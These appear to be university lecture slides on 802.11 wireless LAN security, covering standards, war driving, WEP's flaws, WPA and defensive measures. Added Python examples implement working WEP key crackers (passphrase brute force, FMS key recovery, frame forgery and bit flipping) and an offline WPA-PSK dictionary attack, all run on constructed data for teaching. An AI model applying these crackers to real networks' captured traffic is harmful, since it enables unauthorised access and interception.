Wireless LAN Security
Network Security, Lecture 8

Contents

- Wireless LAN 802.11
- Technology
- Security history
- Vulnerabilities
- Demonstration

Wireless LANs

- IEEE ratified 802.11 in 1997; also known as Wi-Fi.
- Original wireless LAN data rates: 1 Mbps and 2 Mbps.
- WECA (Wireless Ethernet Compatibility Alliance) promoted interoperability; it is now the Wi-Fi Alliance.
- 802.11 covers Layers 1 and 2 of the OSI model:
  - Physical layer
  - Data link layer

802.11 Components

- Two pieces of equipment are defined:
  - Wireless station: a desktop or laptop PC or PDA with a wireless NIC.
  - Access point: a bridge between the wireless and wired networks, composed of
    - a radio,
    - a wired network interface (usually 802.3), and
    - bridging software.
- The access point aggregates access for multiple wireless stations to the wired network.

802.11 modes

- Infrastructure mode
  - Basic Service Set (BSS): one access point.
  - Extended Service Set (ESS): two or more BSSs forming a single subnet.
  - Most corporate LANs run in this mode.
- Ad-hoc mode
  - Also called peer-to-peer; Independent Basic Service Set (IBSS).
  - A set of 802.11 wireless stations that communicate directly without an access point.
  - Useful for quick and easy wireless networks.

Infrastructure mode

(Figure: a Basic Service Set (BSS) is a single cell served by one access point; an Extended Service Set (ESS) joins multiple cells. Labels: Access Point, Station.)

Ad-hoc mode

(Figure: an Independent Basic Service Set (IBSS), stations communicating directly with each other.)

802.11 Physical Layer

- Originally three alternative physical layers:
  - Two incompatible spread-spectrum radios in the 2.4 GHz ISM band:
    - Frequency Hopping Spread Spectrum (FHSS): 79 hop channels of 1 MHz (US and Europe).
    - Direct Sequence Spread Spectrum (DSSS): 14 channels (11 usable in the US).
  - One diffuse infrared layer.
- 802.11 speed: 1 Mbps or 2 Mbps.

802.11 Data Link Layer

- Layer 2 is split into:
  - Logical Link Control (LLC).
  - Media Access Control (MAC).
- LLC: the same 802.2 LLC and 48-bit addresses as 802.3.
- MAC: CSMA/CD is not possible, because a radio can't listen for a collision while it is transmitting.
- CSMA/CA (Collision Avoidance) is used instead:
  - The sender waits for clear air, waits a random back-off time, then sends the data.
  - The receiver sends an explicit ACK when the data arrives intact; a missing ACK triggers retransmission.
  - This also handles interference, but adds overhead.
- 802.11 is therefore always slower than the equivalent 802.3.

Hidden nodes

(Figure: two stations each within range of the access point but out of range of each other, so neither can sense the other's transmission and carrier sensing alone cannot avoid their collisions.)

RTS / CTS

- To handle hidden nodes:
  - The sending station sends a "Request to Send" (RTS).
  - The access point responds with a "Clear to Send" (CTS).
  - All other stations hear the CTS and delay any transmissions for the reserved duration.
- Only used for larger frames (above the RTS threshold), where a retransmission would waste significant time.

802.11b

- 802.11b ratified in 1999, adding 5.5 Mbps and 11 Mbps.
- DSSS as the physical layer: 11 channels (3 non-overlapping).
- Dynamic rate shifting, transparent to higher layers:
  - Ideally 11 Mbps.
  - Shifts down through 5.5 Mbps and 2 Mbps to 1 Mbps at higher range or under interference.
  - Shifts back up when possible.
- Maximum specified range 100 metres; average throughput about 4 Mbps.

Joining a BSS

- When an 802.11 client enters the range of one or more APs:
  - The APs send beacons; a beacon can include the SSID.
  - The AP is chosen on signal strength and observed error rates.
  - After the AP accepts the client, the client tunes to the AP's channel.
- Periodically, all channels are surveyed to check for stronger or more reliable APs; if one is found, the client reassociates with the new AP.

Access Point Roaming

(Figure: a station roaming between access points on channels 1, 4, 7 and 9.)

Roaming and Channels

- Reassociation with a different AP happens on:
  - Moving out of range.
  - High error rates.
  - High network traffic, which allows load balancing.
- Each AP has a channel:
  - 14 partially overlapping channels.
  - Only three channels have no overlap (1, 6 and 11 in the US); these are best for multicell coverage.

802.11a

- 802.11a was ratified in 1999 (products appeared in 2001); supports up to 54 Mbps in the 5 GHz band.
- The higher frequency limits the range.
- A regulated frequency band reduces interference from other devices.
- 12 non-overlapping channels.
- Usable range of 30 metres; average throughput of 30 Mbps.
- Not backwards compatible with 802.11b.

802.11g

- 802.11g was ratified in June 2003; supports up to 54 Mbps in the 2.4 GHz band.
- Backwards compatible with 802.11b.
- 3 non-overlapping channels; range similar to 802.11b.
- Average throughput of 30 Mbps.
- 802.11n was expected in November 2006 at the time of this lecture, aiming for a maximum of 200 Mbps with an average of 100 Mbps (it was finally ratified in September 2009).

Open System Authentication

- Open System Authentication is a null authentication: any station that asks is accepted.
- Service Set Identifier (SSID):
  - A station must specify the SSID to the access point when requesting association.
  - Multiple APs with the same SSID form an Extended Service Set.
  - APs can broadcast their SSID in beacons.
- Some clients allow "*" (any) as the SSID and associate with the strongest AP regardless of its SSID.

MAC ACLs and SSID hiding

- Access points have Access Control Lists (ACLs): a list of allowed MAC addresses, e.g. allow access to:
  - 00:01:42:0E:12:1F
  - 00:01:42:F1:72:AE
  - 00:01:42:4F:E2:01
- But MAC addresses are sniffable and spoofable: an attacker copies an allowed address from captured frames.
- AP beacons without the SSID ("hidden" SSID):
  - essid_jack sends deauthenticate frames to a client.
  - The SSID is then displayed in the clear when the client sends its probe and reassociation frames.

Interception Range

(Figure: a station outside the building perimeter but inside the 100-metre cell of a Basic Service Set.)

Interception

- A wireless LAN uses a radio signal, which is not limited to the physical building.
- The signal is weakened by walls, floors and interference.
- A directional antenna allows interception over longer distances.

Directional Antenna

- A directional antenna provides focused reception.
- DIY plans are available (aluminium cake tin, Chinese cooking sieve):
  - http://www.saunalahti.fi/~elepal/antennie.html
  - http://www.usbwifi.orcon.net.nz/

WarDriving

- Software: Netstumbler, and many more.
- Laptop with an 802.11b, g or a PC card.
- Optional: Global Positioning System; car, bicycle, boat...
- Logs MAC address, network name (SSID), manufacturer, channel, signal strength, noise and, with GPS, location.

WarDriving results

- San Francisco, 2001, at up to 55 miles per hour:
  - 1500 access points.
  - 60% in default configuration.
  - Most connected to internal backbones.
  - 85% using Open System Authentication.
- With a commercial directional antenna: 25 mile range from hilltops.
- Peter Shipley: http://www.dis.org/filez/openlans.pdf

WarDriving map (source: www.dis.org/wl/maps/)

Worldwide War Drive 2004

- Fourth WWWD: www.worldwidewardrive.org
- 228,537 access points:
  - 82,755 (36%) with default SSID.
  - 140,890 (62%) with Open System Authentication.
  - 62,859 (28%) with both, probably default configuration.

Further issues

- Access point configuration: mixtures of SNMP, web, serial and telnet interfaces, with default community strings and default passwords.
- Evil twin access points: a stronger signal captures user authentication.
- Renegade (rogue) access points: unauthorised wireless LANs.

War driving prosecutions

- February 2003, Texas: Stefan Puffer acquitted of wrongful access after demonstrating an unprotected county WLAN to officials.
- June 2004, North Carolina, Lowe's DIY store:
  - Botbyl convicted of stealing credit card numbers via the unprotected WLAN.
  - Timmins convicted of checking email and web browsing via the unprotected WLAN.
- June 2004, Connecticut: Myron Tereshchuk pleaded guilty to drive-by extortion via unprotected WLANs ("make the check payable to M. Tereshchuk").
- September 2004, Los Angeles: Nicholas Tombros pleaded guilty to drive-by spamming via unprotected WLANs.

802.11b Security Services

- Two security services are provided:
  - Authentication: Shared Key Authentication.
  - Encryption: Wired Equivalent Privacy (WEP).

Wired Equivalent Privacy

- One shared key between the stations and an access point.
- In an Extended Service Set, all access points have the same shared key.
- No key management: the shared key is entered manually into every station and every access point.
- A key management nightmare in large wireless LANs: changing the key means touching every device, so in practice keys are rarely changed.

RC4

- "Ron's Code 4" (Rivest Cipher 4): a symmetric stream cipher from RSA Security Inc., designed by Ron Rivest in 1987.
- A trade secret until the source was leaked in 1994.
- RC4 accepts key sizes from 1 bit to 2048 bits.
- RC4 generates a stream of pseudo-random bytes that is XORed with the plaintext to create the ciphertext; the receiver XORs the same keystream to recover the plaintext.

WEP - Sending

- Compute the Integrity Check Value (ICV), a 32-bit Cyclic Redundancy Check (CRC-32) over the message, and append it to the message to create the plaintext. This is meant to provide integrity.
- Encrypt the plaintext with RC4 (confidentiality): the plaintext is XORed with a keystream of pseudo-random bytes.
- The keystream is a function of the 40-bit secret key and a 24-bit initialisation vector (IV), concatenated as IV || key to form the 64-bit RC4 key.
- The IV (in clear) and the ciphertext are transmitted.

WEP Encryption

(Figure: Initialisation Vector (IV) || Secret key -> RC4 PRNG -> Key stream; Plaintext || 32-bit CRC, XORed with the key stream -> Ciphertext; the IV is sent in clear with the ciphertext.)

WEP - Receiving

- The IV and ciphertext are received.
- The ciphertext is decrypted via RC4: it is XORed with the same keystream, which is a function of the 40-bit secret key and the received 24-bit IV.
- Check the ICV: separate the ICV from the message, compute the ICV over the message and compare it with the received ICV; the frame is discarded if they differ.

Shared Key Authentication

- When a station requests association with an access point:
  - The AP sends a random challenge to the station.
  - The station encrypts the challenge with WEP (RC4, the 40-bit shared secret key and a 24-bit IV) and sends it back.
  - The AP decrypts the received message with the same key and IV.
  - The AP compares the decrypted challenge with the one it transmitted; if they match, the station has the shared secret key.
- Caveat: the challenge goes out in clear and its encrypted form follows, so an eavesdropper learns the keystream for that IV (plaintext XOR ciphertext) and can answer a later challenge under the same IV without ever knowing the key.

WEP Safeguards

- The shared secret key is required for associating with an access point, sending data and receiving data.
- Messages are encrypted: confidentiality.
- Messages carry a checksum: integrity.
- But management traffic (beacons, probes, association) is still broadcast in clear, including the SSID.

Initialisation Vector

- The IV must be different for every message transmitted, otherwise the keystream repeats.
- The 802.11 standard doesn't specify how the IV is calculated.
- Wireless cards use several methods:
  - Some use a simple ascending counter for each message.
  - Some switch between alternate ascending and descending counters.
  - Some use a pseudo-random IV generator.

Passive WEP attack

- The IV is only 24 bits: 2^24 = 16,777,216 values.
- With an ascending counter and an access point transmitting at 11 Mbps (roughly 900 full-size frames per second), all IVs are exhausted in about 5 hours; a randomly chosen IV repeats far sooner (birthday bound, after a few thousand frames).
- Passive attack: the attacker collects all traffic and eventually holds two messages encrypted with the same key and the same IV, i.e. with the same keystream.
  - C1 XOR C2 = P1 XOR P2: statistical analysis of the XOR of two plaintexts (or knowledge of one of them) reveals the other.
  - Plaintext XOR Ciphertext = Keystream, reusable for every frame carrying that IV.

Active WEP attack

- If the attacker knows a plaintext and ciphertext pair, the keystream for that IV is known.
  - The attacker can create correctly encrypted messages of that length under that IV.
  - The access point is deceived into accepting them.
- Bit flipping (no keystream needed):
  - Flip a bit in the ciphertext, which flips the same bit in the plaintext.
  - The matching change to the CRC-32 can be computed because the CRC is linear, so the encrypted ICV can be patched to still verify.

Limited WEP keys

- Some vendors generate the WEP key from a user-typed passphrase.
- The passphrase creates only 21 bits of entropy in the 40-bit key; the remaining 19 bits are predictable.
- Key strength is reduced to 21 bits = 2,097,152 possibilities, which can be brute forced in minutes.
- www.lava.net/~newsham/wlan/WEP_password_cracker.ppt

Creating limited WEP keys

(Figure: generating a WEP key from a passphrase.)

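As an added example (not part of the lecture and not Newsham's own code), the passphrase-to-key generator his attack targets, in Python. The algorithm below, which XOR-folds the passphrase into a 32-bit seed and then runs a linear congruential generator whose state bits 16..23 become the key bytes, is the commonly documented one; that any given vendor used exactly these constants is an assumption. The comments show where the 21 bits come from, and crack_wep40 walks the 2^21 effective seeds.

```python
def key_from_seed(seed: int) -> bytes:
    """Five key bytes from a 32-bit seed: one LCG step per byte, key byte = state bits 16..23."""
    key = bytearray()
    for _ in range(5):
        seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
        key.append((seed >> 16) & 0xFF)
    return bytes(key)


def wep40_key_from_passphrase(passphrase: str) -> bytes:
    """XOR-fold the ASCII passphrase into a 32-bit seed, then run the LCG (assumed vendor algorithm)."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << (8 * (i & 3))
    return key_from_seed(seed)


def seed_from_index(index: int) -> int:
    """Map a 21-bit index onto the only seeds an ASCII passphrase can produce.
    Bits 7, 15 and 23 of the seed are always 0 (ASCII bytes are < 0x80, and XOR of
    such bytes stays < 0x80). Bits 24..31 never reach the key: carries in the LCG
    only move upwards and each key byte is taken from bits 16..23, so the low 24
    bits of the state depend only on the low 24 bits of the seed. 24 - 3 = 21 bits."""
    return ((index & 0x7F)
            | ((index >> 7) & 0x7F) << 8
            | ((index >> 14) & 0x7F) << 16)


def crack_wep40(target_key: bytes):
    """Brute force the 2^21 effective seeds; return the first seed that yields target_key."""
    for index in range(1 << 21):
        seed = seed_from_index(index)
        if key_from_seed(seed) == target_key:
            return seed
    return None


if __name__ == "__main__":
    key = wep40_key_from_passphrase("secret")      # constructed example passphrase
    print("WEP key:", key.hex())
    found = crack_wep40(key)                        # a few seconds in CPython
    print("seed recovered:", hex(found), "key:", key_from_seed(found).hex())
```

Recovering the seed is enough: it reproduces the key, so the passphrase itself never has to be guessed.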
Brute force key attack

- Capture ciphertext; the IV is included in the message.
- Search all 2^40 possible secret keys: 1,099,511,627,776 keys, about 170 days on a (2005-era) laptop.
- Find which key decrypts the ciphertext to plausible plaintext: a valid ICV and a 0xAA SNAP header identify a correct guess.

128 bit WEP

- Vendors have extended WEP to 128-bit keys: a 104-bit secret key plus the 24-bit IV.
- Brute force takes about 10^19 years for a 104-bit key.
- This effectively safeguards against brute force, but not against the IV-reuse and key-scheduling attacks, which do not depend on the key length.

Key Scheduling Weakness

- Paper by Fluhrer, Mantin and Shamir, 2001 ("Weaknesses in the Key Scheduling Algorithm of RC4").
- Two weaknesses:
  - Invariance weakness: certain keys leak into the key stream.
  - IV weakness: if a portion of the PRNG input is exposed, analysis of the initial key stream allows the key to be determined.

IV weakness

- WEP exposes part of the PRNG input: the IV is transmitted with the message and forms the first three bytes of the RC4 key.
- Every wireless data frame has a reliable first plaintext byte: the Sub-Network Access Protocol (SNAP) header, used in the logical link control layer (the upper sub-layer of the data link layer), starts with 0xAA.
- The attack:
  - Capture packets with weak IVs (of the form B+3, 255, x when attacking key byte B).
  - First ciphertext byte XOR 0xAA = first key stream byte.
  - The first key stream byte lets the attacker vote on each key byte in turn.
- Practical for 40-bit and 104-bit keys.
- Passive, non-intrusive, no warning.

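The following Python simulation, added here and not taken from the lecture or from any of the tools it names, ties together the slides on Shared Key Authentication, the passive and active WEP attacks and the IV weakness. It implements RC4 and WEP encapsulation, then shows IV reuse leaking P1 XOR P2, known plaintext yielding a reusable keystream (the same leak that lets an eavesdropper pass Shared Key Authentication), CRC-32 bit flipping, and an FMS key recovery from the first ciphertext byte of frames with weak IVs. The 40-bit key, the frame contents and the set of IVs the sniffer sees are constructed test data. The recovery routine accepts any IV that leaves the key schedule in FMS's "resolved" state, which goes slightly beyond the (B+3, 255, x) family described above, as later tools did.

```python
import binascii
import struct


def rc4(key: bytes, n: int) -> bytes:
    """First n keystream bytes of RC4 for key: KSA, then PRGA."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(msg: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the message, little-endian."""
    return struct.pack("<I", binascii.crc32(msg) & 0xFFFFFFFF)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(secret: bytes, iv: bytes, msg: bytes) -> bytes:
    """Frame body: 3-byte IV in clear || RC4(IV || secret) XOR (msg || ICV(msg))."""
    data = msg + icv(msg)
    return iv + xor(data, rc4(iv + secret, len(data)))

def wep_decrypt(secret: bytes, frame: bytes):
    """The message if its ICV checks, else None (a receiver would drop the frame)."""
    data = xor(frame[3:], rc4(frame[:3] + secret, len(frame) - 3))
    msg, tag = data[:-4], data[-4:]
    return msg if icv(msg) == tag else None

def flip_bits(frame: bytes, mask: bytes) -> bytes:
    """Active attack with neither key nor keystream: XOR mask into the encrypted
    message and patch the encrypted ICV, since CRC-32 is affine over GF(2):
    crc(m ^ mask) == crc(m) ^ crc(mask) ^ crc(zeros of the same length)."""
    delta = xor(icv(mask), icv(bytes(len(mask))))
    return frame[:3] + xor(frame[3:], mask + delta)

def fms_recover_key(key_len: int, first_bytes: dict, p0: int = 0xAA) -> bytes:
    """FMS: recover the secret one byte at a time. first_bytes maps IV -> first
    ciphertext byte; the first plaintext byte is the SNAP DSAP 0xAA, so the first
    keystream byte is c0 ^ 0xAA. Any IV that leaves the KSA in the 'resolved'
    state is used; that includes the (b+3, 255, x) family from the lecture."""
    key = b""
    for b in range(key_len):
        votes = [0] * 256
        for iv, c0 in first_bytes.items():
            if iv[0] != b + 3:
                continue
            k = iv + key                       # RC4 key prefix the attacker knows
            s, j = list(range(256)), 0
            for i in range(b + 3):             # replay the KSA steps that prefix drives
                j = (j + s[i] + k[i]) & 0xFF
                s[i], s[j] = s[j], s[i]
            if s[1] >= b + 3 or (s[1] + s[s[1]]) & 0xFF != b + 3:
                continue                       # not resolved: no information about key[b]
            z = c0 ^ p0                        # ~5% of the time z == s[b+3] after step b+3
            votes[(s.index(z) - j - s[b + 3]) & 0xFF] += 1
        key += bytes([max(range(256), key=votes.__getitem__)])
    return key


SECRET = bytes.fromhex("0badc0ffee")                      # constructed 40-bit WEP key
SNAP = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00])    # LLC/SNAP header of an IP frame

def demo_reuse_and_forgery(secret: bytes = SECRET) -> dict:
    """Passive IV reuse, known-plaintext forgery and bit flipping on constructed frames."""
    iv = b"\x0c\x0f\x33"
    p1, p2 = SNAP + b"GET /index.html", SNAP + b"GET /admin.html"
    c1, c2 = wep_encrypt(secret, iv, p1), wep_encrypt(secret, iv, p2)   # IV reused
    p1_xor_p2 = xor(c1[3:], c2[3:])[:len(p1)]             # C1 ^ C2 == P1 ^ P2
    keystream = xor(c1[3:], p1 + icv(p1))                 # known plaintext -> keystream
    p3 = SNAP + b"GET /etc/passwd"                        # same length as p1
    forged = iv + xor(p3 + icv(p3), keystream)            # valid frame, key never known
    flipped = flip_bits(c1, xor(p1, p2))                  # turn "index" into "admin"
    return {"p1_xor_p2": p1_xor_p2, "forged": wep_decrypt(secret, forged),
            "flipped": wep_decrypt(secret, flipped)}

def demo_fms(secret: bytes = SECRET) -> bytes:
    """Sniff the first ciphertext byte of one frame per IV (b+3, y, x), y in
    0xF0..0xFF (the second bytes that can resolve for short keys), then recover the key."""
    first_bytes = {}
    for b in range(len(secret)):
        for y in range(0xF0, 0x100):
            for x in range(256):
                iv = bytes([b + 3, y, x])
                first_bytes[iv] = wep_encrypt(secret, iv, SNAP)[3]
    return fms_recover_key(len(secret), first_bytes)


if __name__ == "__main__":
    print(demo_reuse_and_forgery())
    print("FMS recovered", demo_fms().hex(), "expected", SECRET.hex())
```

The vote formula in fms_recover_key is the one from the paper: once the first b+3 key bytes are known, the state after those KSA steps is known, and whenever the first keystream byte z equals s[b+3] the next key byte is index(z) - j - s[b+3]. A wrong guess scatters votes uniformly, the right one collects about one vote in twenty, which is why a few hundred weak IVs per key byte suffice and why the key length is irrelevant.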
Wepcrack

- The first tool to demonstrate the attack using the IV weakness; open source, by Anton Rager.
- Three components:
  - A weak IV generator.
  - A script to search sniffer output for weak IVs and record the first ciphertext byte.
  - A cracker that combines the weak IVs and the selected first bytes.
- Cumbersome.

Airsnort

- An automated tool by Cypher42, Minnesota, USA. Does it all: sniffs, searches for weak IVs and records encrypted data until the key is derived.
- Needs 100 MB to 1 GB of transmitted data: 3 to 4 hours on a very busy WLAN.

Avoid the weak IVs

- FMS described a simple method to find weak IVs, so many manufacturers avoid those IVs in firmware after 2002; therefore Airsnort and others may not work on recent hardware.
- However, David Hulton (aka h1kari) properly implemented the FMS attack, which shows many more weak IVs, and identified IVs that leak into the second byte of the key stream.
- The second byte of the SNAP header is also 0xAA, so the attack still works on recent hardware and is faster on older hardware.
- Tools: dwepcrack, weplab, aircrack.

Generating WEP traffic

- Not capturing enough traffic? Capture encrypted ARP request packets; anecdotally, frame lengths of 68, 118 and 368 bytes appear appropriate.
- Replay the encrypted ARP packets (WEP has no replay protection) to generate encrypted ARP replies, each carrying a fresh IV.
- aireplay implements this.

802.11 safeguards

- Security policy and architecture design
- Treat as an untrusted LAN
- Discover unauthorised use
- Access point audits
- Station protection
- Access point location
- Antenna design

Security Policy & Architecture

- Define use of the wireless network: what is allowed, what is not allowed.
- Holistic architecture and implementation: consider all threats and design the entire architecture to minimise risk.

Wireless as untrusted LAN

- Treat wireless as untrusted, similar to the Internet.
- Firewall between the WLAN and the backbone.
- Extra authentication required.
- Intrusion detection at the WLAN / backbone junction.
- Vulnerability assessments.

Discover unauthorised use

- Search for unauthorised access points, ad-hoc networks or clients.
- Port scanning for unknown SNMP agents and unknown web or telnet interfaces.
- Warwalking! Sniff 802.11 packets, identify IP addresses, detect signal strength; but you may sniff your neighbours...
- Wireless intrusion detection: AirMagnet, AirDefense, Trapeze, Aruba, ...

Access point audits

- Review the security of access points: are passwords and community strings secure?
- Use firewalls and router ACLs to limit use of access point administration interfaces.
- Standard access point configuration: SSID, WEP keys, community string and password policy.

Station protection

- Personal firewalls protect the station from attackers.
- VPN from the station into the intranet: end-to-end encryption into the trusted network, but consider roaming issues.
- Host intrusion detection provides early warning of intrusions onto a station.
- Configuration scanning checks that stations are securely configured.

Location of Access Points

- Ideally locate access points in the centre of buildings.
- Try to avoid access points by windows, on external walls or with line of sight to outside.
- Use a directional antenna to "point" the radio signal.

WPA

- Wi-Fi Protected Access; works with 802.11b, a and g.
- "Fixes" WEP's problems while existing hardware can be used (firmware upgrade).
- 802.1x user-level authentication.
- TKIP (Temporal Key Integrity Protocol):
  - RC4 with session-based dynamic encryption keys.
  - Per-packet key derivation (key mixing), so the weak-IV attack no longer applies.
  - Unicast and broadcast key management.
  - New 48-bit IV (the TKIP sequence counter) with a new sequencing method that rejects replayed frames.
  - Michael 8-byte message integrity code (MIC) replacing the CRC-32 ICV.
- Optional AES support to replace RC4.

WPA and 802.1x

- 802.1x is a general-purpose network access control mechanism.
- WPA has two modes:
  - Pre-shared key mode (WPA-PSK): one passphrase shared by all stations and the AP.
  - Enterprise mode: Extensible Authentication Protocol (EAP), with a RADIUS server making the authentication decision.
- EAP is a transport for authentication, not authentication itself; it allows arbitrary authentication methods. For example, Windows supports:
  - EAP-TLS, requiring client and server certificates.
  - PEAP-MS-CHAPv2.

Practical WPA attacks

- Dictionary attack on pre-shared key mode: coWPAtty, by Joshua Wright. The pairwise master key is derived from the passphrase and the SSID, so a captured four-way handshake lets the attacker test candidate passphrases offline.
- Denial of service attack:
  - If WPA (TKIP) equipment sees two frames with invalid Michael MICs within 60 seconds, countermeasures engage: all clients are disassociated and all activity stops for one minute.
  - Two malicious frames a minute are enough to stop a wireless network.

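Added example (not from the lecture and not coWPAtty's code) of why WPA-PSK is exposed to an offline dictionary attack: PMK = PBKDF2(passphrase, SSID), PTK = PRF-512(PMK, MACs and nonces), and the handshake MIC is keyed by the first 128 bits of the PTK, so a captured four-way handshake verifies candidate passphrases without touching the network. The SSID, MAC addresses (reusing the ACL examples from an earlier slide), nonces, passphrase, wordlist and EAPOL-Key body are constructed; the MIC follows key descriptor version 1 (HMAC-MD5, as in WPA/TKIP), with version 2 (HMAC-SHA1-128, WPA2/CCMP) selectable.

```python
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..., concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range((nbytes + 19) // 20))
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces)).
    The first 16 bytes are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_zeroed: bytes, version: int = 1) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed: descriptor version 1
    (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 truncated to 128 bits."""
    if version == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


# Constructed network: SSID, AP and station MACs, nonces, the real PSK and a wordlist.
SSID = "linksys"
AA = bytes.fromhex("0001420e121f")
SPA = bytes.fromhex("000142f172ae")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
PASSPHRASE = "correct horse"          # known only to the AP and the station
WORDLIST = ["password", "linksys", "12345678", "correct horse", "letmein1"]


def build_handshake(passphrase: str = PASSPHRASE) -> dict:
    """What a sniffer captures from the four-way handshake: both MACs, both nonces and
    the station's message 2 with its MIC. The EAPOL-Key body is constructed with the
    16-byte MIC field zeroed, which is the state the MIC is computed over."""
    kck = wpa_ptk(wpa_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    eapol = (b"\x01\x03\x00\x5f" + b"\xfe\x01\x0a\x00\x20" + bytes(8) + SNONCE
             + bytes(32) + bytes(16) + b"\x00\x00")
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_psk(hs: dict, wordlist, version: int = 1):
    """Offline dictionary attack: derive PMK and PTK per candidate, then compare the MIC."""
    for word in wordlist:
        kck = wpa_ptk(wpa_pmk(word, hs["ssid"]), hs["aa"], hs["spa"],
                      hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], version), hs["mic"]):
            return word
    return None


if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(build_handshake(), WORDLIST))
```

The 4096 PBKDF2 iterations are the only cost per guess, and since the salt is the SSID, tables can be precomputed for common SSIDs; a long random passphrase or Enterprise mode is the defence.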
802.11i

- Robust Security Network (RSN), ratified in June 2004 and certified as WPA2, extends WPA.
- Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP): based on a mode of AES with 128-bit keys and a 48-bit packet number used in the nonce, which also gives replay protection.
- Also adds dynamic negotiation of authentication and encryption algorithms, allowing for future change.
- Does require new hardware.
- www.drizzle.com/~aboba/IEEE/

Relevant RFCs

- RADIUS Extensions: RFC 2869
- EAP: RFC 2284 (since obsoleted by RFC 3748)
- EAP-TLS: RFC 2716 (since obsoleted by RFC 5216)

Demonstration

- War driving
- Packet sniffing
- Faking APs
- Cracking WEP: brute force, dictionary attack, FMS / h1kari attack
- Airsnarf?
- Packet injection?